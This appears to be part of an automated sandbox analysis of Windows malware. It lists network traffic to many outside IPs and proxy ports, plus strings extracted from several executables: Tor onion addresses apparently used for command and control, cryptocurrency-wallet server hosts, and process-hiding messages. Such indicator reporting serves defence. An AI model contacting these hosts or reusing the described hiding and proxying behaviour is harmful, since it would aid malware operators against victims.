                  Source: global trafficTCP traffic: 72.10.164.178 ports 26959,16593,5043,13341,24431,8293,23305,5959,31871,1953,2589,29389,3113,17803,10235,12613,19511,24847,24769,7037,5673,15891,23871,25799,4519,2,10801,5,6,2893,9,15677,31805,29471,5747
                  Source: global trafficTCP traffic: 162.241.45.22 ports 50528,44931,63501,0,1,5,6,55610
                  Source: global trafficTCP traffic: 171.244.140.160 ports 15141,5189,62310,14253,56076,24015,0,1,2,31643,27020,4,5,27056,37400,53749,8826,34559
                  Source: global trafficTCP traffic: 95.217.104.21 ports 24815,1,2,4,5,8
                  Source: global trafficTCP traffic: 93.190.142.57 ports 41890,0,1,4,26541,8,9
                  Source: global trafficTCP traffic: 162.214.197.102 ports 42019,0,3,4,6,46430
                  Source: global trafficTCP traffic: 62.122.201.246 ports 0,1,2,5,9,50129
                  Source: global trafficTCP traffic: 51.158.111.76 ports 1,3,6,7,9,16379
                  Source: global trafficTCP traffic: 162.241.79.22 ports 1,3,5,52048,8,35318
                  Source: global trafficTCP traffic: 184.178.172.28 ports 15294,1,2,4,5,9
                  Source: global trafficTCP traffic: 91.134.140.160 ports 20896,16487,48962,49687,2572,56495,57320,27207,9141,32896,32588,1,53012,30895,11946,3,5,8879,5401,51513,39803,49042,12217
                  Source: global trafficTCP traffic: 160.153.245.187 ports 38586,35138,59786,5,6,7,8,9,6116,31745
                  Source: global trafficTCP traffic: 51.178.182.200 ports 1,2,3,6,7,63172
                  Source: global trafficTCP traffic: 184.178.172.18 ports 15280,0,1,2,5,8
                  Source: global trafficTCP traffic: 45.81.232.17 ports 27855,59421,54393,23711,1,2,30696,4,8,47056,21481,4715
                  Source: global trafficTCP traffic: 51.158.79.76 ports 1,3,6,7,9,16379
                  Source: global trafficTCP traffic: 72.195.34.35 ports 0,2,27360,3,6,7
                  Source: global trafficTCP traffic: 107.180.90.248 ports 7698,6,7,8,9,43240
                  Source: global trafficTCP traffic: 159.89.163.18 ports 1,2,3,23196,6,9
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exeString found in binary or memory: s25519: internal error: setShortBytes called with a long stringhttp2: Transport closing idle conn %p (forSingleUse=%v, maxStream=%v)http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.oniontls: handshake message of length %d bytes exceeds maximum o
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exeString found in binary or memory: nvalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackint
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000400000.00000040.00000001.01000000.00000012.sdmpString found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in 
addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3380987818.000000000C07A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://papmcl4r32awafck75y5446n252qqqq4h6c4y2slaayposrtfbcebdqd.onionC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.comC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.exeC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.batC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.cmdC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.vbsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.vbeC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.jsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.jseC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.wsfC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.wshC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.mscPROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntel
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.0000000002DA0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in 
addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3380987818.000000000C01A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://papmcl4r32awafck75y5446n252qqqq4h6c4y2slaayposrtfbcebdqd.onion
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3380987818.000000000C01A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: !210e113336571014061e5d361525000421http://papmcl4r32awafck75y5446n252qqqq4h6c4y2slaayposrtfbcebdqd.onionhttp://papmcl4r32awafck75y5446n252qqqq4h6c4y2slaayposrtfbcebdqd.onionS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\TestAppS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7https://dumppage.orghttp://papmcl4r32awafck75y5446n252qqqq4h6c4y2slaayposrtfbcebdqd.onionS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7FirstInstallDateS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzIntel(R) Core(TM)2 CPU 6600 @ 2.40 GHzS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7C:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.comC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.exeC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.batC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.cmdC:\Program Files (x86)\Common 
Files\Oracle\Java\javapath\powershell.vbsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.vbeC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.jsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.jseC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.wsfC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.wshC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.mscPROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6SESSIONNAME=ConsoleUSERDOMAIN=user-PCwindir=C:\WindowsPROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelSeDebugPrivilege
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3380987818.000000000C078000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dumppage.orghttp://papmcl4r32awafck75y5446n252qqqq4h6c4y2slaayposrtfbcebdqd.onionCommonProgramW6432=C:\Program Files\Common FilesFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerS-1-5-21-2246122658-3693405117-2476756634-1003
                  Source: sUyDoVTGsfEnMY0oeyexTBut.exeString found in binary or memory: s25519: internal error: setShortBytes called with a long stringhttp2: Transport closing idle conn %p (forSingleUse=%v, maxStream=%v)http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.oniontls: handshake message of length %d bytes exceeds maximum o
                  Source: sUyDoVTGsfEnMY0oeyexTBut.exeString found in binary or memory: nvalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackint
                  Source: sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3381117576.000000000C0D6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://papmcl4r32awafck75y5446n252qqqq4h6c4y2slaayposrtfbcebdqd.onion
                  Source: sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3381117576.000000000C0D6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: !This program cannoHKEY_USERS\S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\TestAppHKEY_USERS\S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7https://dumppage.orghttp://papmcl4r32awafck75y5446n252qqqq4h6c4y2slaayposrtfbcebdqd.onionhttps://dumppage.orghttp://papmcl4r32awafck75y5446n252qqqq4h6c4y2slaayposrtfbcebdqd.onionSELECT Caption FROM Win32_OperatingSystemC:\Windows\System32\WindowsPowerShell\v1.0\powershellCOMPUTERNAME=user-PCHOMEPATH=\Users\userLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2PROCESSOR_REVISION=8f08PUBLIC=C:\Users\PublicSystemRoot=C:\Windows
                  Source: sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000002E10000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in 
addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
                  Source: sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3381117576.000000000C128000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dumppage.orghttp://papmcl4r32awafck75y5446n252qqqq4h6c4y2slaayposrtfbcebdqd.onion
                  Source: sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3381117576.000000000C0A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://papmcl4r32awafck75y5446n252qqqq4h6c4y2slaayposrtfbcebdqd.onion
                  Source: sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3381117576.000000000C108000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: S-1-5-21-2246122658-3693405117-2476756634-1003 https://dumppage.org http://papmcl4r32awafck75y5446n252qqqq4h6c4y2slaayposrtfbcebdqd.onion CommonProgramW6432=C:\Program Files\Common Files FPS_BROWSER_APP_PROFILE_STRING=Internet Explorer S-1-5-21-2246122658-3693405117-2476756634-1003
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exe String found in binary or memory: s25519: internal error: setShortBytes called with a long string http2: Transport closing idle conn %p (forSingleUse=%v, maxStream=%v) http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion tls: handshake message of length %d bytes exceeds maximum o
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3501355077.000000000C1D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://o3fonzjs63n3ovdmbb5tfew6s7dpi4sirnapbiog67myalzi5pe5o2yd.onion
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3501355077.000000000C1D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://papmcl4r32awafck75y5446n252qqqq4h6c4y2slaayposrtfbcebdqd.onion
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3501355077.000000000C1DA000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://dumppage.org http://papmcl4r32awafck75y5446n252qqqq4h6c4y2slaayposrtfbcebdqd.onion CommonProgramW6432=C:\Program Files\Common Files FPS_BROWSER_APP_PROFILE_STRING=Internet Explorer S-1-5-21-2246122658-3693405117-2476756634-1003
                  Source: MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3380991027.000000000C01A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://o3fonzjs63n3ovdmbb5tfew6s7dpi4sirnapbiog67myalzi5pe5o2yd.onion
                  Source: MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3380991027.000000000C01A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://papmcl4r32awafck75y5446n252qqqq4h6c4y2slaayposrtfbcebdqd.onion
                  Source: MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3380991027.000000000C07C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://papmcl4r32awafck75y5446n252qqqq4h6c4y2slaayposrtfbcebdqd.onion
                  Source: MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3380991027.000000000C07A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://dumppage.org http://papmcl4r32awafck75y5446n252qqqq4h6c4y2slaayposrtfbcebdqd.onion
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50397 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50403 -> 52929
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50037
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50144
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 57752
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50307 -> 3129
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 64109
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50442 -> 5432
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50430 -> 59727
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50359 -> 15673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50386 -> 11251
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50443 -> 8000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 7732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50388 -> 1082
                  Source: unknownNetwork traffic detected: HTTP traffic on port 2324 -> 50116
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50394 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 35081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50142 -> 41274
                  Source: unknownNetwork traffic detected: HTTP traffic on port 1080 -> 49943
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50345 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50392 -> 9229
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50461 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50413 -> 1081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50431 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50445 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50404 -> 9001
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50456 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50441 -> 57327
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50435 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50460 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50444 -> 16487
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50506 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50405 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50572 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50537 -> 8000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50462 -> 7518
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 54570
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50248 -> 8899
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 27294
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 12457
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 8082
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50452 -> 1983
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50493 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 1081 -> 50266
                  Source: unknownNetwork traffic detected: HTTP traffic on port 5432 -> 50442
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50500 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50494 -> 6009
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50620 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 15294
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50524 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50651 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50489 -> 8880
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50189 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 30464
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50597 -> 8081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50294 -> 58630
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50566 -> 88
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50684 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 26927
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50568 -> 10001
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50587 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49995
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50676 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 55806
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50686 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50312 -> 60651
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50727 -> 8000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50709 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50656 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50506
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50599 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50650 -> 32708
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50747 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50792 -> 28810
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50635 -> 6012
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50431
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 50537
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3129 -> 50307
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50758 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 41368
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50677 -> 5566
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50651
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50698 -> 25256
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50435
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9001 -> 50404
                  Source: unknownNetwork traffic detected: HTTP traffic on port 1082 -> 50388
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50699 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50668 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50715 -> 20060
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 22538
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50843 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50755 -> 10006
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 15280
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50775 -> 27360
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50819 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 1080 -> 50345
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50733 -> 53778
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50712 -> 8000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50320 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50767 -> 15673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50760 -> 52276
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50756 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50133 -> 45840
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 1981
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50255 -> 36366
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50788 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49980
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50737 -> 44268
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 50597
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50880 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50803 -> 8081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 9375
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50403 -> 52929
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 50727
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50777 -> 53281
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50921 -> 35316
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50879 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50881 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50430 -> 59727
